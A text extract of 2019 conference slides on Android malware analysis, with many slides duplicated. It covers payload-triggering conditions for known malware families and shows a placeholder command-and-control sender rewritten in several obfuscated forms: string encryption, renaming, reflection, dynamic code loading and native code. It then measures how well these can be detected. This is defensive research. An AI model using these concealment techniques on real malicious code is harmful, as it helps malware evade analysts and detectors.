obfuscated android application...
TRANSCRIPT
Introduction Malware examples Malware analysis Obfuscation Results
Obfuscated Android Application Development
Jean-François LalandePierre Graux Valérie Viet Triem Tong
CECC 2019
November 14th 2019
3 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Android malware analysis
Android malware analysisstatic analysis: (byte)code parsing +CFG analysisdynamic analysis: execution(smartphone, cuckoo sandbox)
Research goals:
malware detection, classificationflow recovering, data taintingpayload triggering, unpacking
By Con-struct + replicant
community [CC BY-SA 3.0]
3 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Android malware analysis
Android malware analysisstatic analysis: (byte)code parsing +CFG analysisdynamic analysis: execution(smartphone, cuckoo sandbox)
Research goals:
malware detection, classificationflow recovering, data taintingpayload triggering, unpacking
By Con-struct + replicant
community [CC BY-SA 3.0]
4 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Research papers
Research papers usually do:1 Algorithm design e.g. malware detection2 Pick or build a dataset3 Evaluation: pick a sample and run!
Building a dataset is difficult!
Where to find these sample? Are they representative?. . .
Evaluating is difficult!
You may suffer crashes, operating system corruption. . .
What about “difficult” malware?Do we have them in the dataset?Triggering conditions?Obfuscated?
4 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Research papers
Research papers usually do:1 Algorithm design e.g. malware detection2 Pick or build a dataset3 Evaluation: pick a sample and run!
Building a dataset is difficult!
Where to find these sample? Are they representative?. . .
Evaluating is difficult!
You may suffer crashes, operating system corruption. . .
What about “difficult” malware?Do we have them in the dataset?Triggering conditions?Obfuscated?
4 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Research papers
Research papers usually do:1 Algorithm design e.g. malware detection2 Pick or build a dataset3 Evaluation: pick a sample and run!
Building a dataset is difficult!
Where to find these sample? Are they representative?. . .
Evaluating is difficult!
You may suffer crashes, operating system corruption. . .
What about “difficult” malware?Do we have them in the dataset?Triggering conditions?Obfuscated?
4 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Research papers
Research papers usually do:1 Algorithm design e.g. malware detection2 Pick or build a dataset3 Evaluation: pick a sample and run!
Building a dataset is difficult!
Where to find these sample? Are they representative?. . .
Evaluating is difficult!
You may suffer crashes, operating system corruption. . .
What about “difficult” malware?Do we have them in the dataset?Triggering conditions?Obfuscated?
6 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Example: Remote Admin Tools
Install malicious apps:
Badnews: Obeys to a remote server + delays attackTriggering: Patch the bytecode + Build a fake server
DroidKungFu1 (well known): Delays attackTriggering: Modify ’start’ to 1 in sstimestamp.xml andreboot the device
7 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Example: Blocker / Eraser
Wipes of the SD card and block social apps:
WipeLocker: Delayed AttackTriggering: Launch the app and reboot the device
8 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Example: Adware
Displays adds after some days:MobiDash: Delayed AttackTriggering: Launch the application, reboot the device andmodify com.cardgame.durak_preferences.xml
9 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Example: Spyware
Steals contacts, sms, IMEI, . . .SaveMe: Verifies the Internet accessTriggering: Enable Internet access and lauch the app
Cajino: Obeys a Baidu remote serverTriggering: Simulate a server command with an Intent
10 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Ransomware
Encrypts user’s files and asks for paying:
SimpleLockerWaits the reboot of the deviceTriggering: send a BOOT_COMPLETED intent
12 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Our analysis framework: GroddDroid1
APK
StaticAnalysis
CFG
Payload Location
API usage, etc.
Control Flow Tracer
TargetingOne Payload
Real smartphone
GroddDroidRunner
ReferenceExecution
LogCollector
controls
NewAPK
Malicious CodeTrigering Coverage
CodeCoverage
Execution withBranch Forcing
controls
GroddDroid ForcesControl Flow
New APK
1Abraham et al. 2015, Leslous et al. 2017
12 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Our analysis framework: GroddDroid1
APK
StaticAnalysis
CFG
Payload Location
API usage, etc.
Control Flow Tracer
TargetingOne Payload
Real smartphone
GroddDroidRunner
ReferenceExecution
LogCollector
controls
NewAPK
Malicious CodeTrigering Coverage
CodeCoverage
Execution withBranch Forcing
controls
GroddDroid ForcesControl Flow
New APK
1Abraham et al. 2015, Leslous et al. 2017
12 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Our analysis framework: GroddDroid1
APK
StaticAnalysis
CFG
Payload Location
API usage, etc.
Control Flow Tracer
TargetingOne Payload
Real smartphone
GroddDroidRunner
ReferenceExecution
LogCollector
controls
NewAPK
Malicious CodeTrigering Coverage
CodeCoverage
Execution withBranch Forcing
controls
GroddDroid ForcesControl Flow
New APK
1Abraham et al. 2015, Leslous et al. 2017
12 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Our analysis framework: GroddDroid1
APK
StaticAnalysis
CFG
Payload Location
API usage, etc.
Control Flow Tracer
TargetingOne Payload
Real smartphone
GroddDroidRunner
ReferenceExecution
LogCollector
controls
NewAPK
Malicious CodeTrigering Coverage
CodeCoverage
Execution withBranch Forcing
controls
GroddDroid ForcesControl Flow
New APK
1Abraham et al. 2015, Leslous et al. 2017
12 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Our analysis framework: GroddDroid1
APK
StaticAnalysis
CFG
Payload Location
API usage, etc.
Control Flow Tracer
TargetingOne Payload
Real smartphone
GroddDroidRunner
ReferenceExecution
LogCollector
controls
NewAPK
Malicious CodeTrigering Coverage
CodeCoverage
Execution withBranch Forcing
controls
GroddDroid ForcesControl Flow
New APK
1Abraham et al. 2015, Leslous et al. 2017
13 / 37
Introduction Malware examples Malware analysis Obfuscation Results
GroddDroid output example: simplelocker
14 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Triggering conditions?
1 installed = getPackageManager()2 .getPackageInfo("jf.andro.malcon15demo2",0)3 .firstInstallTime;4 SimpleDateFormat sdf = new SimpleDateFormat("yyyy");5 int yearInstalled = Integer.parseInt(sdf.format(installed));
7 // We trigger the malicious code next year !8 if (currentYear > yearInstalled)9 {
10 // payload11 }
Listing 1: Example of triggering condition
15 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Our analysis framework: GroddDroid1
APK
StaticAnalysis
CFG
Payload Location
API usage, etc.
Control Flow Tracer
TargetingOne Payload
Real smartphone
GroddDroidRunner
ReferenceExecution
LogCollector
controls
NewAPK
Malicious CodeTrigering Coverage
CodeCoverage
Execution withBranch Forcing
controls
GroddDroid ForcesControl Flow
New APK
1Abraham et al. 2015, Leslous et al. 2017
15 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Our analysis framework: GroddDroid1
APK
StaticAnalysis
CFG
Payload Location
API usage, etc.
Control Flow Tracer
TargetingOne Payload
Real smartphone
GroddDroidRunner
ReferenceExecution
LogCollector
controls
NewAPK
Malicious CodeTrigering Coverage
CodeCoverage
Execution withBranch Forcing
controls
GroddDroid ForcesControl Flow
New APK
1Abraham et al. 2015, Leslous et al. 2017
16 / 37
Introduction Malware examples Malware analysis Obfuscation Results
So, all problems are solved?
DatasetsYou don’t really know what you have in datasets.
Dynamic analysisYou have to help malware to execute themselves.
Static analysisObfuscation can prevent you to:
Analyze or build your datasetDrive your dynamic analysis
⇒ we have the feeling that obfuscation use is increasing. . .
16 / 37
Introduction Malware examples Malware analysis Obfuscation Results
So, all problems are solved?
DatasetsYou don’t really know what you have in datasets.
Dynamic analysisYou have to help malware to execute themselves.
Static analysisObfuscation can prevent you to:
Analyze or build your datasetDrive your dynamic analysis
⇒ we have the feeling that obfuscation use is increasing. . .
16 / 37
Introduction Malware examples Malware analysis Obfuscation Results
So, all problems are solved?
DatasetsYou don’t really know what you have in datasets.
Dynamic analysisYou have to help malware to execute themselves.
Static analysisObfuscation can prevent you to:
Analyze or build your datasetDrive your dynamic analysis
⇒ we have the feeling that obfuscation use is increasing. . .
18 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Studying obfuscation
Objectives:
Explain how to build obfuscated applicationsPropose detection algorithmsMeasure obfuscation usage in the wild
Contributions:
Explain how to build obfuscated applicationsDetection algorithms are difficult to designWe can only measure programming usage techniques
18 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Studying obfuscation
Objectives:
Explain how to build obfuscated applicationsPropose detection algorithmsMeasure obfuscation usage in the wild
Contributions:
Explain how to build obfuscated applicationsDetection algorithms are difficult to designWe can only measure programming usage techniques
19 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Running example: connecting to a CC server
1 class CommandAndControl {2 public String url = "cc.url";3 public int port = 4242;4 public void sendCommand(byte[] buf, int length) {5 DatagramPacket dp = new DatagramPacket(buf, length,6 InetAddress.getByName(this.url),7 this.port);8 new DatagramSocket().send(dp));9 }
10 }
Listing 2: Unobfuscated malicious code
20 / 37
Introduction Malware examples Malware analysis Obfuscation Results
String encryption
1 class AES256 {2 static public String aes256(String str) {3 String key = "<<key>>"... }4 }5 class CommandAndControl {6 public String url = "<<ciphered url>>"; // "cc.url"7 public int port = 4242;8 public void sendCommand(byte[] buf, int length) {9 DatagramPacket dp = new DatagramPacket(buf, length,
10 InetAddress.getByName(AES256.aes256(this.url)),11 this.port);12 new DatagramSocket().send(dp);13 }14 }
Listing 3: String encrypted version
21 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Running example: identifier renaming
1 class ____ {2 public String ____ = "cc.url";3 public int ___ = 4242;4 public void ________(byte[] __, int _____) {5 DatagramPacket _______ = new DatagramPacket(__,6 _____,7 InetAddress.getByName(this.____),8 this.___);9 new DatagramSocket().send(_______);
10 }}
Listing 4: Identifier renaming version
22 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Running example: reflection
1 class CommandAndControl {2 public String url = "cc.url";3 public int port = 4242;4 public void sendCommand(byte[] buf, int length) {5 InetAddress addr = InetAddress.class6 .getDeclaredMethod("get"+"ByName", String.class)7 .invoke(null, this.url);8 DatagramPacket dp = new DatagramPacket(buf, length,9 addr, this.port);
10 DatagramSocket.class.getDeclaredMethod("s"+"end",11 DatagramPacket.class)12 .invoke(new DatagramSocket(), dp);13 }}
Listing 5: Reflection version
23 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Running example: dynamic code loading
1 void invokeDynamically() {2 /* Loads the implementation of C&C */3 PathClassLoader pcl =4 new PathClassLoader(file.getPath(), null);5 Class<?> clazz =6 pcl.loadClass("CommandAndControl", this);7 Log.i("CL", "Loaded class from dex: " + clazz);8 Constructor<?> c = clazz.getConstructor();9 Object o = c.newInstance();
10 Method m = clazz.getMethod("send",11 byte[].class, int.class);12 m.invoke(o, ...); // CommandAndControl.send(....)13 }
Listing 6: Dynamic code loading version
24 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Running example: native methods
1 class CommandAndControl {2 public String url = "cc.url";3 public int port = 4242;4 native public sendCommand(byte[] buf, int length);5 }6 JNICALL Java_CommandAndControl_sendCommand(JNIEnv*env,7 jobject thisPtr, jbyteArray buf, jint length) {
9 byte * bufData = env->GetByteArrayElements(buf, NULL);10 jint port = env->GetIntField(thisPtr,11 env->GetFieldId(env->GetObjectClass(thisPtr),12 "port", "I"));
14 /* Use libc functions to send the packet */15 }
Listing 7: Native version
25 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Running example: packer
Unpacker:
Unpack routine: unpack the bytecode of the applicationLoad and run this new bytecode
26 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Detecting obfuscation?
Is obfuscation used in the wild?Can we design a detection technique for obfuscated app ?
APK APK’obfuscation
Goal:
classify APK as non obfuscatedclassify APK’ as obfuscated
27 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Detection techniques
Detecting techniques for obfuscation purpose ?
Table: Overview of our analysis methods
Development technique Analysis method DetectionString encryption usage ratio yes (threshold)
Identifier renaming usage ratio yes (threshold)Reflection use no
Dynamic code loading use noNative method use no
Packer artifacts yes
27 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Detection techniques
Detecting techniques for obfuscation purpose ?
Table: Overview of our analysis methods
Development technique Analysis method DetectionString encryption usage ratio yes (threshold)
Identifier renaming usage ratio yes (threshold)
Reflection use noDynamic code loading use no
Native method use noPacker artifacts yes
27 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Detection techniques
Detecting techniques for obfuscation purpose ?
Table: Overview of our analysis methods
Development technique Analysis method DetectionString encryption usage ratio yes (threshold)
Identifier renaming usage ratio yes (threshold)Reflection use no
Dynamic code loading use noNative method use no
Packer artifacts yes
27 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Detection techniques
Detecting techniques for obfuscation purpose ?
Table: Overview of our analysis methods
Development technique Analysis method DetectionString encryption usage ratio yes (threshold)
Identifier renaming usage ratio yes (threshold)Reflection use no
Dynamic code loading use no
Native method use noPacker artifacts yes
27 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Detection techniques
Detecting techniques for obfuscation purpose ?
Table: Overview of our analysis methods
Development technique Analysis method DetectionString encryption usage ratio yes (threshold)
Identifier renaming usage ratio yes (threshold)Reflection use no
Dynamic code loading use noNative method use no
Packer artifacts yes
27 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Detection techniques
Detecting techniques for obfuscation purpose ?
Table: Overview of our analysis methods
Development technique Analysis method DetectionString encryption usage ratio yes (threshold)
Identifier renaming usage ratio yes (threshold)Reflection use no
Dynamic code loading use noNative method use no
Packer artifacts yes
27 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Detection techniques
Detecting techniques for obfuscation purpose ?
Table: Overview of our analysis methods
Development technique Analysis method DetectionString encryption usage ratio yes (threshold)
Identifier renaming usage ratio yes (threshold)Reflection use no
Dynamic code loading use noNative method use no
Packer artifacts yes
28 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Strings encryption
APK Constant Strings Entropy e
n strings st. e > T
extract compute
Decision Threshold: choose n=1, 10, 100;
29 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Identifier renaming
APKNB Identifierssize filtering
Matching
n matchesRatio j = nNB
Worddictionary
extract
Examples:
1 private Integer my_variable; // Original2 private String zwf_fwz; // Renamed3 private String u; // Too short: cannot conclude
30 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Other techniques
Reflection java.lang.reflect
Dynamic code loading DexFile, PathClassLoaderNative methods: private native void f()
Packers: artifact detection with Apkid
32 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Datasets
AMD Dataset (Wei et al. [4]): 24,552 samples 10-16Drebin (Arp et al. [2]): 5,560 samples 08-12GoodMal19 (Viet Triem Tong et al. [3]): 10,000 samples15-18Androzoo (Allix et al. [1]): 9,041 samples 08-18
33 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Obfuscation detection
Total Packer Native DCL Reflection
GOOD [3] 4999 3 1266 4544 47350,06% 25,58% 91,82% 95,68%
MAL [3] 4991 542 2378 3730 389310,86% 57,62% 90,38% 94,33%
AMD [4] 24552 31 5206 15267 191840,13% 21,52% 63,12% 79,31%
Drebin [2] 5560 0 1051 1449 30660% 19,07% 26,29% 55,62%
34 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Identifier renaming
0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0Ratio threshold
20
0
20
40
60
80
100
120
13
Dete
ctio
n ra
te
GOODMALAMDDrebin
35 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Entropy for GOOD Dataset
0.0 1.0 2.0 3.0 4.0 5.04.4 4.6Entropy threshold
0
20
40
60
80
100
11
Dete
ctio
n ra
tio
n = 1n = 10n = 100
36 / 37
Introduction Malware examples Malware analysis Obfuscation Results
Conclusion and future works
Obfuscationusage increasedifficult to distinguish from legitimate use
Future works:Analysis of native applicationsDataset building and usePyMaO: an open source software for orchestratingexperiments
1 / 2
References I
[1] Kevin Allix, Tegawendé F. Bissyandé, Jacques Klein, andYves Le Traon.Androzoo: Collecting millions of android apps for theresearch community.In 13th International Conference on Mining SoftwareRepositories, MSR ’16, pages 468–471, New York, NY,USA, 2016. ACM.
[2] Daniel Arp, Michael Spreitzenbarth, Malte Hubner, HugoGascon, Konrad Rieck, and CERT Siemens.Drebin: Effective and explainable detection of androidmalware in your pocket.In 21st Annual Network and Distributed System SecuritySymposium, volume 14, pages 23–26, San Diego, CA,USA, 2014.
2 / 2
References II
[3] V. Viet Triem Tong, C. Herzog, T. Concepción Miranda,P. Graux, J.-F. Lalande, and P. Wilke.Isolating malicious code in android malware in the wild.In 14th International Conference on Malicious andUnwanted Software, Nantucket, MA, USA, 2019. IEEEComputer Society.
[4] Fengguo Wei, Yuping Li, Sankardas Roy, Xinming Ou, andWu Zhou.Deep ground truth analysis of current android malware.In International Conference on Detection of Intrusions andMalware, and Vulnerability Assessment, pages 252–276.Springer, 2017.